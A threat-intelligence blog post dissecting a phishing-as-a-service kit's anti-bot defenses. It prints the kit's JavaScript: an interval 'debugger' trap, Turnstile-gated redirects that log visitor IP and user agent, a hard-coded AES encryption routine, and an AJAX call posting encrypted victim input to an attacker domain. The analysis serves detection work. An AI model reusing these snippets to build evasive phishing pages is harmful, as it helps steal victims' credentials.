- Published on
PaaS Effective Anti-Bot Measures
- Authors
- Name
- Joshua Rawles
Executive Summary
In recent investigations into advanced phishing techniques, we analysed current PAAS portals and discovered new tactics employed by what appears to be an updated iteration of previously reported PAAS platforms, tentatively named RaccoonO365. Recent activity observed on Telegram coincided with the rollout of anti-bot measures, indicating ongoing enhancements in defense evasion strategies.
During our analysis, attempts to probe identified domains using URLSCAN yielded unexpected redirects to sites like X, Amazon, and Walmart. This anomaly prompted a deeper examination using debugger tools, revealing simple but effective "anti-debugger" techniques that actively prevented in-browser debugger analysis thereby hindering further network request analysis. Subsequent analysis exposed many Defense Evasion techniques such as the deployment of Cloudflare turnstiles, dynamic URL generation, encryption mechanisms, and other sophisticated methods designed to complicate automated detection efforts.
Introduction
In the previous blogs on RaccoonO365 and Tycoon we explored sophisticated PAAS portals and how they operate.
Recently I have come across some interesting tactics from what I believe to be an updated version of the previously discussed portals. Though yet still unconfirmed if it is actually(RaccoonO365). Recent posts on telegram do match up to when the updated Defense Evasion (anti-bot) measures started appearing.
I noticed that when inputting these domains into URLSCAN I getting re-directed to websites such as X, Amazon and Walmart.
This prompted me to want to have a look at the network tab in browser and find what is going on with the requests, as I was sure it was a phishing portal. I switched around VPNs until i finally got a hit.
When I landed on the page the classic cloudflare turnstile prompt appeared, so I went to open my debugger and have a look at the network requests and the source to see if it was the same portal as before. I was then hit with a "Paused in debugger".
Instead I decided to view the page source and saw the good old familiar atob loaded script, but also with a href too!
1st Stage Technical Overview
A fetch will be performed to a random domain which appears to be randomly generated before the cloudflare turnstile is even loaded.
If the response from the generated URI is "0" then the turnstile API script will be loaded. If the response is not 0 you will be re-directed to whichever href was loaded in that iteration of the website.
Let's break down the original script hosted at hxxps[://]jyr[.]yxnc2e[.]com/9ut47fy/ and explain the defense evasion techniques.
External Scripts
<script src="hxxps[://]code[.]jquery[.]com/jquery-3[.]6[.]0[.]min[.]js"></script>
<script src="hxxps[://]challenges[.]cloudflare[.]com/turnstile/v0/api[.]js?render=explicit"></script>
- A JavaScript library for easier manipulation of HTML documents, event handling, and AJAX interactions.
- CAPTCHA service provided by Cloudflare. The use of Cloudflare Turnstile is used by threat actors to hide their malicious server's real location and protect it from being taken down. In this instance it is also utilised to capture IPs and user-agents and generate certain redirects based off the outcome.
Meta Tags
<meta name="robots" content="noindex, nofollow">
- Tells search engines not to list the webpage in search results (noindex) and not to follow links on the page (nofollow). This helps keep sensitive information private and prevents unauthorized scraping of the website.
Title
<title>Financial Forecasting</title>
- The title of the web page. This will be randomly generated and appear as the name on the browser "tab". I assume this is to make the website appear more legitimate, however it rings alarm bells for me when looking at it.
Content and Forms
<div id="fyiTYLznrz" class="container">
<div id="jOMXWdydWo" class="row justify-content-center">
<div class="text-center">
<form id="hIDPqGEvwc">
<div class="cf_turnstile" id="cf"></div>
<input type="hidden" id="pagelink" name="pagelink" value="">
<input type="hidden" id="bltdip" name="bltdip" value="My_IP_Address">
<input type="hidden" id="bltdref" name="bltdref" value="">
<input type="hidden" id="bltdua" name="bltdua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0">
<input type="hidden" id="bltddata" name="bltddata" value="">
</form>
<div class="text-center" id="OJgDZbQiry">Your browser is being checked for secure online access.</div>
</div>
</div>
</div>
- Turnstile Information Gathering
- Gathering information such as IP addresses (
bltdip), referrers (bltdref), and user agents (bltdua). This data helps the attackers understand their targets better and refine their approach. By understanding who is visiting the portal, it can aid in evasion by tailoring attacks and avoiding detection.
- Gathering information such as IP addresses (
Anti-Debugging Script
<script>
setInterval(() => {
const t0 = Date[.]now();
eval('debugger');
const t1 = Date[.]now();
}, 1000);
</script>
- Debugger Evasion
- Sets an interval to call
debuggerevery second, this is a simple tactic to prevent utilizing the debugger view for checking network requests. This is a very simple but effective tactic.
- Sets an interval to call
CAPTCHA Rendering and Form Handling
<script>
turnstile[.]render('#cf', {
sitekey: '0x4AAAAAAAVDyhrZXvYXS92c',
'error-callback': vhtqxCDmsQ,
callback: wCfWGJmmQc,
});
function vhtqxCDmsQ() {
turnstile[.]reset();
}
function wCfWGJmmQc() {
var pdzpdargsQ = document[.]getElementById("hIDPqGEvwc");
pdzpdargsQ[.]onsubmit = function (event) {
event[.]preventDefault();
};
document[.]getElementById("pagelink").value = 'PHi2L8';
var yvCoBHOpZK = "../aj19N7hyvgtpgjFO8QBwMgMUViomWH6tKqTzJp70yo";
fetch(yvCoBHOpZK, {
method: "POST",
body: new FormData(pdzpdargsQ)
}).then(response => {
return response[.]json();
}).then(data => {
if(data['status'] == 'success'){
location[.]reload();
}
if(data['status'] == 'error'){
window[.]location[.]href = '/mwdjqzcvaurfWUAVTGpAPgi2CZylAidFgkoqsfmqxi?pbgzbsbVVJPKANNQRYZXYJLXDCVBSUCIPLGQLSHQBWUQEHVSLWPNWSZNNHBFPFFNYtblifkfpxmccettsshdagzyhapgqpvuqzkjuxwxalqecjclrhh';
}
});
}
</script>
CAPTCHA Integration (Turnstile):
- This tactic helps evade automated analysis by presenting CAPTCHA challenges within the phishing site, hindering detection from automated analysis.
Dynamic URL Generation:
- Dynamically generating URLs like (yvCoBHOpZK) at runtime is primarily used to evade detection by security systems. It's particularly effective in obscuring the true destinations of communication channels and infrastructure.
Response-Based Actions:
- The script responds to server feedback (data['status']). If the outcome signals success ('success'), the script refreshes the page (location.reload()), possibly to hide traces or adjust session details. If an error surfaces ('error'), the browser is re-directed to a predetermined URL (window.location.href). This redirection serves again to prevent automated analysis as a human has to pass through the turnstile render to proceed to the phishing site.
Once the cloudflare turnstile is completed, or the initial fetch request decides you already have an active session, you will be redirected to the actual phishing portal. At first glance the url also uses the same anti-debugger tactic, and fetches content in a similar fashion.
By simply changing the document.write to a console.log again we can view the 2nd-stage script being loaded.
2nd Stage Technical Overview
External Scripts
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://cdn.socket.io/4.6.0/socket.io.min.js"></script>
<script src="https://github.com/fent/randexp.js/releases/download/v0.4.3/randexp.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<script src="https://www.google.com/recaptcha/api.js"></script>
- Already explained in Stage 1
- Socket.io enables real-time bidirectional communication, facilitating dynamic updates to phishing pages and data exfiltration. This is also utilized for the data exfiltration previously mentioned in article Azure x11 Compromises = Tycoon.
- Randexp generates random strings to mimic legitimate inputs, obscuring URLs and form fields to hide the origin of infrastructure.
- CryptoJS provides encryption for securing stolen data transmission and evading detection.
- Used to fend off automated URL analysis systems from viewing the actual content of phishing pages, reCaptcha barriers also increases the site's credibility.
Encryption Method:
function encryptData(data) {
const key = CryptoJS.enc.Utf8.parse('1234567890123456');
const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
const encrypted = CryptoJS.AES.encrypt(data, key, {
iv: iv,
padding: CryptoJS.pad.Pkcs7,
mode: CryptoJS.mode.CBC
});
return encrypted.toString();
}
- The CryptoJS library is used for secure transmission, to conceal the communication of information being sent to the C2, making traffic analysis difficult.
AJAX Requests to Suspicious URLs:
$.ajax({
url: 'hxxps[://]JFJR[.]ingstio[.]com/BnLdsMGSflTtxPOXqyOtMbkmYhZBOWIQRJTAPMHRBYZLXSXXWKNVYDUBTGWNNPCIPZLFMXOHGAHCU' + randroute,
type: 'POST',
data: { data: encrypteddata },
});
- This AJAX request sends encrypted data (encrypteddata) to a dynamically generated URL. This is where the CryptoJS encrypted variables are sent and responses are loaded depending on user input.
Interval Debugger:
<script>
setInterval(() => {
const t0 = Date[.]now();
eval('debugger');
const t1 = Date[.]now();
}, 1000);
</script>
Same anti-debugger is in the 2nd-stage just like before.
User Agent and Browser Detection
let userAgent = navigator.userAgent;
let browserName;
if (userAgent.match(/chrome|chromium|crios/i)) {
browserName = "chrome";
} else if (userAgent.match(/firefox|fxios/i)) {
browserName = "firefox";
} else if (userAgent.match(/safari/i)) {
browserName = "safari";
} else if (userAgent.match(/opr\//i)) {
browserName = "opera";
} else if (userAgent.match(/edg/i)) {
browserName = "edge";
} else {
browserName = "No browser detection";
}
- Identifies the user's browser to customize how responses and content are dynamically loaded into the browser.
Hidden Elements and Obfuscated Code:
<script>
var websitenames = ["godaddy"];
var capnum = 1;
var appnum = 1;
var view = "";
var pagelinkval = "PHi2L8";
var emailcheck = "0";
var webname = rtrim("/web8/", "/");
var urlo = "uhWaQBrcIdpa34BRhnzOaJ24edeMnemevnq4g5lxOGkEJX6fiGgujl";
var gdf = "ijiAiZUN09zeMhcs2taSdyzyPCNIsMOS8mcd120";
</script>
- Uses obfuscated variable names and code to obscure functionality and evade static analysis.
Disguised as Legitimate Service:
<div class="firstlogo"></div>
<img src="wxSjcYMP250FKktPTstJhYdOREbsOvO934130"/>
<body class="startnew" style="background-image: url('/mnDWOipXOpKswPVOYE9wkWp4PSYTDz58tzoijYGR9hPcRqERILLNIY9oKO5fxBZ7pEcwx220');">
- Utilizes images, logos, and background images that mimic a legitimate service, aiming to deceive users into believing the phishing site is authentic.
Conclusion
Our investigation reveals a notable evolution in phishing tactics, demonstrating how anti-debugging, CAPTCHA systems and dynamic URL generation are now used to evade detection effectively. Through the strategic deployment of Cloudflare turnstiles, attackers obscure their server locations while gathering vital IP and user-agent information. These tactics not only bolster the authenticity of phishing sites but also pose significant challenges for automated defense mechanisms, making it increasingly difficult for cybersecurity experts to detect and counteract such threats. As adversaries persist in advancing their methods, it becomes paramount for defenders to remain vigilant and implement proactive strategies to safeguard against these evolving tactics.